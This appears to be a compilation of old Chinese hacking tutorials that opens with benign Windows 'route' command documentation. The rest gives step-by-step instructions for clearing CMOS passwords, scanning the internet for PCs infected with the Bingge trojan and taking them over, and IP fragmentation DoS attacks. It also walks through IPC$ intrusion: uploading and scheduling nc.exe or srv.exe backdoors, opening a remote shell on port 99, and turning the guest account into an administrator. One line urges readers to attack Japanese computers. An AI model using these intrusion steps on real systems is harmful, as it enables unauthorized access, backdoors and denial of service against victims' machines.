与 add 命令共同使用时,指定路由被添加到注册表并在启动 TCP/IP 协议的时候初始化 IP 路由表。默认情况下,启动 TCP/IP 协议时不会保存添加的路由。与 print 命令一起使用时,则显示永久路由列表。所有其它的命令都忽略此参数。永久路由存储在注册表中的位置是 HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip/Parameters/PersistentRoutes。
Command
指定要运行的命令。下表列出了有效的命令。 命令 目的
add 添加路由
change 更改现存路由
delete 删除路由
print 打印路由
Destination
指定路由的网络目标地址。目标地址可以是一个 IP 网络地址(其中网络地址的主机地址位设置为 0),对于主机路由是 IP 地址,对于默认路由是 0.0.0.0。
mask subnetmask
指定与网络目标地址相关联的网掩码(又称之为子网掩码)。子网掩码对于 IP 网络地址可以是一适当的子网掩码,对于主机路由是 255.255.255.255 ,对于默认路由是 0.0.0.0。如果忽略,则使用子网掩码 255.255.255.255。定义路由时由于目标地址和子网掩码之间的关系,目标地址不能比它对应的子网掩码更为详细。换句话说,如果子网掩码的一位是 0,则目标地址中的对应位就不能设置为 1。
Gateway
指定超过由网络目标和子网掩码定义的可达到的地址集的前一个或下一个跃点 IP 地址。对于本地连接的子网路由,网关地址是分配给连接子网接口的 IP 地址。对于要经过一个或多个路由器才可用到的远程路由,网关地址是一个分配给相邻路由器的、可直接达到的 IP 地址。
metric Metric
为路由指定所需跃点数的整数值(范围是 1 ~ 9999),它用来在路由表里的多个路由中选择与转发包中的目标地址最为匹配的路由。所选的路由具有最少的跃点数。跃点数能够反映跃点的数量、路径的速度、路径可靠性、路径吞吐量以及管理属性。
if Interface
指定目标可以到达的接口的接口索引。使用 route print 命令可以显示接口及其对应接口索引的列表。对于接口索引可以使用十进制或十六进制的值。对于十六进制值,要在十六进制数的前面加上 0x。忽略 if 参数时,接口由网关地址确定。
/?
在命令提示符显示帮助。
注释
路由表中 跃点数 一列的值较大是由于允许 TCP/IP 根据每个 LAN 接口的 IP 地址、子网掩码和默认网关的配置自动确定路由表中路由的跃点数造成的。默认启动的自动确定接口跃点数确定了每个接口的速度,调整了每个接口的路由跃点数,因此最快接口所创建的路由具有最低的跃点数。要删除大跃点数,请在每个 LAN 连接的 TCP/IP 协议的高级属性中禁用自动确定接口跃点数。
如果在 systemroot/System32/Drivers/Etc 文件夹的本地网络文件中存在适当的条目,名称可以用于 Destination。只要名称可以通过“域名系统” (DNS) 查询这样的标准主机名解析技术分解为 IP 地址,就可以将其用于 Gateway,DNS 查询使用存储在 systemroot/System32/Drivers/Etc 文件夹下的本地主机文件和 NetBIOS 名称解析。
如果是 print 或 delete 命令,可以忽略 Gateway 参数,使用通配符来表示目标和网关。Destination 的值可以是由星号 (*) 指定的通配符。如果指定目标含有一个星号 (*) 或问号 (?),它被看作是通配符,只打印或删除匹配的目标路由。星号代表任意一字符序列,问号代表任一字符。例如, 10.*.1, 192.168.*、 127.* 和 *224* 都是星号通配符的有效使用。
使用了无效的目标和子网掩码(网掩码)值的组合,会显示“Route:bad gateway address netmask”错误消息。目标中有一位或多位设置为 1,而其在子网掩码中的对应位设置为 0 时会发生这个错误。可以通过二进制表示法表示目标和子网掩码来检查这种情况。以二进制表示的子网掩码包括表示目标网络地址部分的一连串的 1 和表示目标主机地址部分的一连串的 0 两个部分。查看目标以确定目标的主机地址部分(由子网掩码所定义)是否有些位设置成了 1。
只有 Windows NT 4.0、Windows 2000、Windows Millennium Edition 和 Windows XP 的 route 命令支持 -p 参数。Windows 95 或 Windows 98 的 route 命令不支持该参数。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要显示 IP 路由表的完整内容,请键入:
route print
要显示 IP 路由表中以 10. 开始的路由,请键入:
route print 10.*
要添加默认网关地址为 192.168.12.1 的默认路由,请键入:
route add 0.0.0.0 mask 0.0.0.0 192.168.12.1
要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1 的路由,请键入:
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1
要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1 的永久路由,请键入:
route -p add 10.41.0.0 mask 255.255.0.0 10.27.0.1
要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1,跃点数为 7 的路由,请键入:
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 metric 7
要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1,接口索引为 0x3 的路由,请键入:
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 if 0x3
要删除目标为 10.41.0.0,子网掩码为 255.255.0.0 的路由,请键入:
route delete 10.41.0.0 mask 255.255.0.0
要删除 IP 路由表中以 10. 开始的所有路由,请键入:
route delete 10.*
要将目标为 10.41.0.0,子网掩码为 255.255.0.0 的路由的下一个跃点地址由 10.27.0.1 更改为 10.27.0.25,请键入:
route change 10.41.0.0 mask 255.255.0.0 10.27.0.25
使用Debug清除CMOS密码5法
方法1 debug
-o 70 16
-o 71 16
-q
方法2 debug
-o 70 11
-o 71 FF
-q
方法3 debug
-o 70 10
-o 71 10
-q
方法4 debug
-o 70 23
-o 71 34
-q
方法5 debug
-o 70 10
-o 71 FF
-q
以上请在DOS下运行!如果一种方法不行,请换一种,5种里面一定有一种可以破解你的CMOS密码。
如何网上入侵对方个人电脑
这道快餐是专门为从来没有通过网络进入过对方计算机的网络新手们准备的,主要使用的软件就是著名的国产木马冰河2.2,所以,如果你已经使用过冰河2.2,就不必跟着我们往下走了。其他有兴趣的网络新手们,Let's go!
第一步
下载必备的工具软件。1号软件就是端口扫描工具“网络刺客II”,2号软件就是著名的国产木马冰河2.2的控制端。下载完毕并解压缩之后跟我进行第二步!
第二步
运行1号软件,首先出现的是“网络刺客II注册向导”,别理它,点击“稍后(Q)”就进入了网络刺客II的主界面。
第三步
在网络刺客II的主界面里选“工具箱(U)”-》“主机查找器(H)”,就进入了“搜索因特网主机”界面。
第四步
进入“搜索因特网主机”界面后,“起始地址”栏填XXX.XXX.0.0其中XXX.XXX自己去选择了,比如你可以选61.128或选61.200等等,“结束地址”栏填XXX.XXX.255.255其中XXX.XXX的选择要和前面一样。“端口”栏填7626,其他栏保持默认不动。
好了,以上设置就是要搜索从XXX.XXX.0.0到XXX.XXX.255.255这一段IP地址中有冰河木马的计算机了,再检查一下填对没有?如果一切OK,请点击“开始搜索”。
第五步
观察“总进度”和“段进度”是否在走动。如果没有走动,那一定是IP地址设置不对,请认真检查。如果两个进度都在走动,呵呵,你就成功一半了,至少你会使用网络刺客II扫描网上开放某一端口的计算机了。
下面你要作的就是静静的等待,学用黑客软件是需要耐心的。大约20-30分钟后,最下面的记录栏里就应该出现记录了(一般情况下,应该有5、6条记录)。每一条记录代表找到的中了冰河木马的一台计算机,前面是该计算机的IP地址,后面是7626(冰河木马端口)。
第六步
点击“停止搜索”,但不要退出程序,到第十二步时还要用。运行2号软件冰河,进入冰河主界面。选“文件[F]”-》“添加主机[A]”进入添加主机窗口。
第七步
在“添加主机”窗口,“显示名称”里填入第五步里搜索到的第一条IP地址,当IP地址填入“显示名称”里后,“主机地址”里就自动填入相同的IP了。“访问口令”不填,“监听端口”保持默认的7626。
好了,检查一下IP有没有填错,如果OK,点击“确定”,在冰河主界面的“文件管理器”里就出现了刚才填入的IP地址了。
第八步
这一步和下一步最重要,请认真看清楚!在冰河的主界面里,点击“文件管理器”里的“我的电脑”,这时“文件管理器”右边的框里就会出现你自己的硬盘分区。比如,如果你的硬盘分的是四个区,“文件管理器”右边的框里就会从上往下依次出现C:、D:、E:、F:,如果你的硬盘分的是两个区,就会出现C:、D:。
第九步
点击“文件管理器”里刚才输入的第一条IP地址,稍等片刻(网速慢的情况下约10-30秒),在“文件管理器”右边的框里就会出现对方计算机的硬盘分区了。看到了吗?看到了?呵呵,祝贺你,你已经成功地进入对方的计算机了!!!!!
第十步
你发现没有出现对方计算机的硬盘分区!!呵呵,别急,看看冰河主界面最下端的状态栏里有什么提示,如果是下面两种情况,就放弃,返回第七步,填入搜索到的第二条IP地址:
1、状态栏里出现“口令不对”、“口令错误”、“密码不对”、“密码错误”等之类的提示,表示该计算机的冰河木马是加了密码的,没有办法,只得放弃!
2、状态栏里出现“正在解释命令,可能是1.2以前版本”等之类的提示,也放弃,新手是搞不定的,如果以后你熟练了可以给对方升级,这是后话!!
第十一步
如果出现的是“主机没有响应”、“无法与主机建立连接”之类的提示,先别忙放弃,重复3-4遍第八步到第九步的操作,即点击“我的电脑”-》点击输入的IP地址,如此反复3-4遍后,还是不行的话再放弃,返回第七步,填入搜索到的下一条IP地址。
第十二步
如果所有搜索到的IP地址按照第七步至第十一步操作后都不能进入对方计算机,呵呵,那是你的运气太差!别急,这样的运气是经常碰到的!再返回第五步,在“搜索因特网主机”界面里点击“开始搜索”,这时该程序又从你停止的IP地址接着往下搜索了!!呵呵,等吧!!搜索吧!!只要你有时间,你一定能成功!
第十三步
终于成功了!我见到对方计算机硬盘分区了!呵呵,怎么样?你成功了,我的任务就完成了。进入对方计算机后,所有的操作和自己计算机“文件管理器”里的操作一模一样!就没什么黑不到过来的了!
详解IP碎片攻击
1. 为什么存在IP碎片
-=-=-=-=-=-=-=-=-=-=-=
链路层具有最大传输单元MTU这个特性,它限制了数据帧的最大长度,不同的网络类型都有一个上限值。以太网的MTU是1500,你可以用 netstat -i 命令查看这个值。如果IP层有数据包要传,而且数据包的长度超过了MTU,那么IP层就要对数据包进行分片(fragmentation)操作,使每一片的长度都小于或等于MTU。我们假设要传输一个UDP数据包,以太网的MTU为1500字节,一般IP首部为20字节,UDP首部为8字节,数据的净荷(payload)部分预留是1500-20-8=1472字节。如果数据部分大于1472字节,就会出现分片现象。
IP首部包含了分片和重组所需的信息:
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identification |R|DF|MF| Fragment Offset |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|<-------------16-------------->|<--3-->|<---------13---------->|
Identification:发送端发送的IP数据包标识字段都是一个唯一值,该值在分片时被复制到每个片中。
R:保留未用。
DF:Don't Fragment,“不分片”位,如果将这一比特置1 ,IP层将不对数据报进行分片。
MF:More Fragment,“更多的片”,除了最后一片外,其他每个组成数据报的片都要把该比特置1。
Fragment Offset:该片偏移原始数据包开始处的位置。偏移的字节数是该值乘以8。
另外,当数据报被分片后,每个片的总长度值要改为该片的长度值。
每一IP分片都各自路由,到达目的主机后在IP层重组,请放心,首部中的数据能够正确完成分片的重组。你不禁要问,既然分片可以被重组,那么所谓的碎片攻击是如何产生的呢?
2. IP碎片攻击
-=-=-=-=-=-=-=-=-=-=-=
IP首部有两个字节表示整个IP数据包的长度,所以IP数据包最长只能为0xFFFF,就是65535字节。如果有意发送总长度超过65535的IP碎片,一些老的系统内核在处理的时候就会出现问题,导致崩溃或者拒绝服务。另外,如果分片之间偏移量经过精心构造,一些系统就无法处理,导致死机。所以说,漏洞的起因是出在重组算法上。下面我们逐个分析一些著名的碎片攻击程序,来了解如何人为制造IP碎片来攻击系统。
3. ping o' death
-=-=-=-=-=-=-=-=-=-=-=
ping o' death是利用ICMP协议的一种碎片攻击。攻击者发送一个长度超过65535的Echo Request数据包,目标主机在重组分片的时候会造成事先分配的65535字节缓冲区溢出,系统通常会崩溃或挂起。ping不就是发送ICMP Echo Request数据包的吗?让我们尝试攻击一下吧!不管IP和ICMP首部长度了,数据长度反正是多多益善,就65535吧,发送一个包:
# ping -c 1 -s 65535 192.168.0.1
Error: packet size 65535 is too large. Maximum is 65507
不走运,看来Linux自带的ping不允许我们做坏事。
65507是它计算好的:65535-20-8=65507。Win2K下的ping更抠门,数据只允许65500大小。所以你必须找另外的程序来发包,但是目前新版本的操作系统已经搞定这个缺陷了,所以你还是继续往下阅读本文吧。
顺便提一下,记得99年有“爱国主义黑客”(“红客”的前辈)发动全国网民在某一时刻开始ping某美国站点,试图ping死远程服务器。这其实是一种ping flood攻击,用大量的Echo Request包减慢主机的响应速度和阻塞目标网络,原理和ping o' death是不一样的,这点要分清楚。
4. jolt2
-=-=-=-=-=-=-=-=-=-=-=
jolt2.c是在一个死循环中不停的发送一个ICMP/UDP的IP碎片,可以使Windows系统的机器死锁。我测试了没打SP的Windows 2000,CPU利用率会立即上升到100%,鼠标无法移动。
我们用Snort分别抓取采用ICMP和UDP协议发送的数据包。
发送的ICMP包:
01/07-15:33:26.974096 192.168.0.9 -> 192.168.0.1
ICMP TTL:255 TOS:0x0 ID:1109 IpLen:20 DgmLen:29
Frag Offset: 0x1FFE Frag Size: 0x9
08 00 00 00 00 00 00 00 00 .........
发送的UDP包:
01/10-14:21:00.298282 192.168.0.9 -> 192.168.0.1
UDP TTL:255 TOS:0x0 ID:1109 IpLen:20 DgmLen:29
Frag Offset: 0x1FFE Frag Size: 0x9
04 D3 04 D2 00 09 00 00 61 ........a
从上面的结果可以看出:
* 分片标志位MF=0,说明是最后一个分片。
* 偏移量为0x1FFE,计算重组后的长度为 (0x1FFE * 8) + 29 = 65549 > 65535,溢出。
* IP包的ID为1109,可以作为IDS检测的一个特征。
* ICMP包:
类型为8、代码为0,是Echo Request;
校验和为0x0000,程序没有计算校验,所以确切的说这个ICMP包是非法的。
* UDP包:
目的端口由用户在命令参数中指定;
源端口是目的端口和1235进行OR的结果;
校验和为0x0000,和ICMP的一样,没有计算,非法的UDP。
净荷部分只有一个字符'a'。
jolt2.c应该可以伪造源IP地址,但是源程序中并没有把用户试图伪装的IP地址赋值给src_addr,不知道作者是不是故意的。
jolt2的影响相当大,通过不停的发送这个偏移量很大的数据包,不仅死锁未打补丁的Windows系统,同时也大大增加了网络流量。曾经有人利用jolt2模拟网络流量,测试IDS在高负载流量下的攻击检测效率,就是利用这个特性。
5. teardrop
-=-=-=-=-=-=-=-=-=-=-=
teardrop也比较简单,默认发送两个UDP数据包,就能使某些Linux内核崩溃。Snort抓取的结果如下:
第一个:
01/08-11:42:21.985853 192.168.0.9 -> 192.168.0.1
UDP TTL:XX TOS:0x0 ID:242 IpLen:20 DgmLen:56 MF
Frag Offset: 0x0 Frag Size: 0x24
A0 A8 86 C7 00 24 00 00 00 00 00 00 00 00 00 00 .....$..........
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 ....
* MF=1,偏移量=0,分片IP包的第一个。
* 结构图:
|<-------20-------->|<------8------>|<---------------28---------------->|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| IP | UDP | Data |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
第二个:
01/08-11:42:21.985853 192.168.0.9 -> 192.168.0.1
UDP TTL:XX TOS:0x0 ID:242 IpLen:20 DgmLen:24
Frag Offset: 0x3 Frag Size: 0x4
A0 A8 86 C7 ....
* MF=0,偏移量=0x3,偏移字节数为 0x3 * 8 = 24,最后一个分片。
* 结构图:
|<-------20-------->|<--4-->|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| IP | Data |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
如果修改源代码,第二片IP包的偏移量也可以为0x4,偏移字节数就是 0x4 * 8 = 32。
下面的结构图表示了接收端重组分片的过程,分别对应于偏移字节数为24和32两种情况:
|<-------20-------->|<------8------>|<---------------28---------------->|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| IP | UDP | Data |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
| +-+-+-+-+
|<------------- 24 ------------->| Data |
| +-+-+-+-+
|<--4-->|
|
| +-+-+-+-+
|<------------------- 32 ------------------>| Data |
| +-+-+-+-+
|<--4-->|
可以看出,第二片IP包的偏移量小于第一片结束的位移,而且算上第二片IP包的Data,也未超过第一片的尾部,这就是重叠现象(overlap)。老的Linux内核(1.x - 2.0.x)在处理这种重叠分片的时候存在问题,WinNT/95在接收到10至50个teardrop分片时也会崩溃。你可以阅读teardrop.c的源代码来了解如何构造并发送这种数据包。
6. 如何阻止IP碎片攻击
-=-=-=-=-=-=-=-=-=-=-=
* Windows系统请打上最新的Service Pack,目前的Linux内核已经不受影响。
* 如果可能,在网络边界上禁止碎片包通过,或者用iptables限制每秒通过碎片包的数目。
* 如果防火墙有重组碎片的功能,请确保自身的算法没有问题,否则被DoS就会影响整个网络。
* Win2K系统中,自定义IP安全策略,设置“碎片检查”。
一份详尽的IPC$入侵资料
网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.
不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少).
因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复!
二 什么是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。
我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。
所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的.
解惑:
1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能,其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数,所以不能在Windows 9.x中运行。
也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)
2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接
3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表
三 建立ipc$连接在hack攻击中的作用
就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!!
(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server,还可以考虑开启终端服务方便控制.怎么样?够厉害吧!)
不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的:(
因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接.
所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在.
四 ipc$与空连接,139,445端口,默认共享的关系
以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)
1)ipc$与空连接:
不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.
许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).
2)ipc$与139,445端口:
ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.
3)ipc$与默认共享
默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)
五 ipc$连接失败的原因
以下5个原因是比较常见的:
1)你的系统不是NT或以上操作系统;
2)对方没有打开ipc$默认共享
3)对方未开启139或445端口(惑被防火墙屏蔽)
4)你的命令输入有误(比如缺少了空格等)
5)用户名或密码错误(空连接当然无所谓了)
另外,你也可以根据返回的错误号分析原因:
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。
关于ipc$连不上的问题比较复杂,除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了.
六 如何打开目标的IPC$(此段引自相关文章)
首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马,当然,这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法),还是不行的话(比如有防火墙,杀不了)建议放弃。
七 如何防范ipc$入侵
1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/LSA]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)
2禁止默认共享
1)察看本地共享资源
运行-cmd-输入net share
2)删除共享(每次输入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3)停止server服务
net stop server /y (重新启动后server服务会重新开启)
4)修改注册表
运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/LanmanServer/Parameters]把AutoShareServer(DWORD)的键值改为:00000000。
pro版:找到如下主键[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/LanmanServer/Parameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。
3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用
4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师
5设置复杂密码,防止通过ipc$穷举密码
八 相关命令
1)建立空连接:
net use //IP/ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)
2)建立非空连接:
net use //IP/ipc$ "用户名" /user:"密码" (同样有3个空格)
3)映射默认共享:
net use z: //IP/c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: //IP/c$
4)删除一个ipc$连接
net use //IP/ipc$ /del
5)删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认
九 经典入侵模式
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)
1. C:/>net use //127.0.0.1/IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2. C:/>copy srv.exe //127.0.0.1/admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:/winnt/system32/,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:/>net time //127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4. C:/>at //127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
5. C:/>net time //127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
6. C:/>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
7.C:/>copy ntlm.exe //127.0.0.1/admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:/WINNT/system32>ntlm
输入ntlm启动(这里的C:/WINNT/system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10. C:/>net user guest /active:yes
将对方的Guest用户激活
11. C:/>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:/>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)
总结:
关于ipc入侵就说这么多了,觉得已经够详细了,如果有不准确的地方,希望能与大家讨论.
最后,希望大家不要随便入侵,我写这篇文章的目的是想解答大家的疑惑,并不是鼓励大家随便的入侵,如果你非想试一下,建议拿小日本的机子开练(什么?为什么?因为我讨厌日本,没别的)
一般入略的几个命令
一般入侵所需要的几个常用命令 一般入侵所需要的几个常用命令
如果写得不好别笑啊。我觉得写这些更有用,不会像其他人一样写一些很无聊不现实的文章。当然这只是我的想法,我也有缺点的。
1:NET
只要你拥有某IP的用户名和密码,那就用IPC$做连接吧!
这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为127.0.0.1
net use //127.0.0.1/ipc$ "123456" /user:"hbx"
退出的命令是
net use //127.0.0.1/ipc$ /delte
下面的操作你必须登陆后才可以用.登陆的方法就在上面.
----------------------
下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户.
我们加一个heibai的用户密码为lovechina
net user heibai lovechina /add
只要显示命令成功,那么我们可以把他加入Administrator组了.
net localgroup Administrators heibai /add
----------------------
这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘.
net use z://127.0.0.1/c$
----------------------
net start telnet
这样可以打开对方的TELNET服务.
----------------------
这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?不知道是否这样,我的2000就是删除不了它。
net user guest /active:yes
----------------------
这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,其他用户也可以的。只要有权限就行了呀!
net user guest lovechina
net命令果然强大啊!
2:at
一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢?
那么需要用AT命令,这里假设你已经登陆了那个服务器。
你首先要得到对方的时间,
net time //127.0.0.1
将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其ID=1
at //127.0.0.1 12:3 nc.exe
这里假设了一个木马,名为NC.EXE,这个东西要在对方服务器上.
这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它是一个TELNET服务,端口为99.
等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马.
3:telnet
这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口.
telnet 127.0.0.1 99
这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡.
4:FTP
它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,如果真的找不到,我给个WWW.51.NET,不错的.当我们申请完后,它会给用户名,密码,以及FTP服务器.
在上传前需要登陆先,这里我们假设FTP服务器是WWW.51.NET,用户名是HUCJS,密码是654321
ftp www.51.net
他会要求输入用户,成功后会要求输入密码.
----------------------
下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:/下,传到对方D:/
get c:/index.htm d:/
假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下
put c:/index.htm d:/
5:copy
